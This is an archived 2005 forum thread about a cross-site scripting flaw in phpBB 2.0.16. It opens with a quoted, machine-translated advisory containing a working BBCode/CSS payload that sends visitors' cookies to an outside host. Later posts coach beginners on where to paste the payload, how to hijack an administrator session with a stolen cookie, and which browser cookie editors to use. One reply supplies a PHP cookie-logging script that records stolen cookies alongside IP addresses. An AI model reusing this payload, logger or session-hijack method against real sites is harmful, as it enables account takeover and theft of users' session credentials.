Phpbb 2.0.16 Exploit

GovernmentSecurity.org > System Security > Exploit Research & Discussion

whisker

Jul 7 2005, 10:35 AM

I just found this article:

QUOTE

carry out XSS attack.

The remote user can put specially processed combination BB of tags into the communication of forum in order to carry out the arbitrary code in the browser of the user, that visited the ill-intended communication. Vulnerability can be used for the theft of the classified information of user (identifier of session or Cooks).

Eksploit:
[ color=#.EFEFEF][.url].www.ut[.url=.www.s = ' '
style='.font-size:0;.color:#.EFEFEF '
style='.top:expression(.eval(.this.sss)); '
sss=`.i=.new/**/.Image();
i.src='.http://antichat.ru/cgi-bin/s.jpg?'+.document.cookie;
this.sss=.null`.style='.font-size:0; ]
[/url][/.url]'[/.color ]

On the spot TSVET_FONA should be entered the code of background in the communication, used in this skin of forum. For the the standard subsilver this # EFEFEF. This is done so that by the naked eye the introduction of our sploita not would be noticeable on other browsers, where the code although is received incorrectly, practical benefit it will not bring, but instead of this it vykenet into the browser long plain reference.

URL the producer: http://www.phpbb.com

from http://www.securitylab.ru/55612.html translated using http://babelfish.altavista.com/

Paul

Jul 7 2005, 02:32 PM

http://www.securityfocus.org/bid/14151

AtApi

Jul 13 2005, 05:37 AM

Hi guys, just a question: after you grab the cookie what you can do?
i mean is possible to use it to log in? by using the credentials contained in the cookie?
like with Live Http under mozilla?

myth

Jul 13 2005, 05:51 AM

AtApi,

Firefox, cant remember the exact name atm, has a plugin to allow you to play with the cookies...

Using that plugin, you put in the admin username and the returned cookie and then the website just thinks you've select the 'Keep Me Logged In' Option, and uses that cookie...

BinaryHero

Jul 19 2005, 11:04 PM

ok maybe i missed something but what exactly does this do? how do you work it? sorry guys

myth

Jul 20 2005, 06:37 AM

Basically, retireves the cookie

phpBB uses cookies so you dont have to login each time, if you steal an admins cookie and use that, well, you dont have to login at all - because the phpbb forum will read your cookie, (which is the stolen one) and think your the admin....

Thats the end result of how the exploit kinda works.... but i think theres another thread on this anyway, not sure

BinaryHero

Jul 20 2005, 10:57 AM

Hey thanks for the reply mate

one more question though

where do you put this code

[ color=#.EFEFEF][.url].www.ut[.url=.www.s = ' '
style='.font-size:0;.color:#.EFEFEF '
style='.top:expression(.eval(.this.sss)); '
sss=`.i=.new/**/.Image();
i.src='.http://antichat.ru/cgi-bin/s.jpg?'+.document.cookie;
this.sss=.null`.style='.font-size:0; ]
[/url][/.url]'[/.color ]

Just anywhere on the forums? do I need to edit that in some way or just post as is?

thanks any help is appreciated

tikbalang

Jul 20 2005, 01:35 PM

afaik...those codes need to be part of your post in a forum powered by phpbb.

-tikz

BinaryHero

Jul 28 2005, 01:42 AM

i cant figure out how to edit the html code to actually make it html, i made it so the color works but other than that i cant figure it out

mekros

Jul 28 2005, 07:47 AM

can you clarify more on that, binary...

BinaryHero

Jul 29 2005, 08:56 AM

like if you post that code directly it doesnt work...
i can make it work a little bit by changing [/.color] to [/color]

so what else do i have to edit in the code to make it work..... or am i just lame and it should work by posting it directly like it is...

sorry im a newb

ShoCK FX

Jul 31 2005, 04:36 PM

You need a movie to understand? heh ok here:
http://kisobox.com/area51/phpbb2.0.16xss/

hope it helps

Dr.Network

Aug 9 2005, 06:14 PM

it works with every server i write there...? how the exploit write the "cookies" on the server?

apsync

Aug 10 2005, 03:36 PM

QUOTE(Dr.Network @ Aug 9 2005, 07:14 PM)

it works with every server i write there...?

no, 2.0.17 is not vulnerable

QUOTE(Dr.Network @ Aug 9 2005, 07:14 PM)

how the exploit write the "cookies" on the server?

it sends its cookies to you, and you can save it with the following php script.

CODE

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, ' Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' ');
fclose($fp);
?>

JustAsFire

Aug 10 2005, 03:41 PM

QUOTE(myth @ Jul 13 2005, 05:51 AM)

AtApi,

Firefox, cant remember the exact name atm, has a plugin to allow you to play with the cookies....

Live HTTP headers

crock

Aug 10 2005, 07:54 PM

Cookie Editor:
hxxp://addneditcookies.mozdev.org/screenshots.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.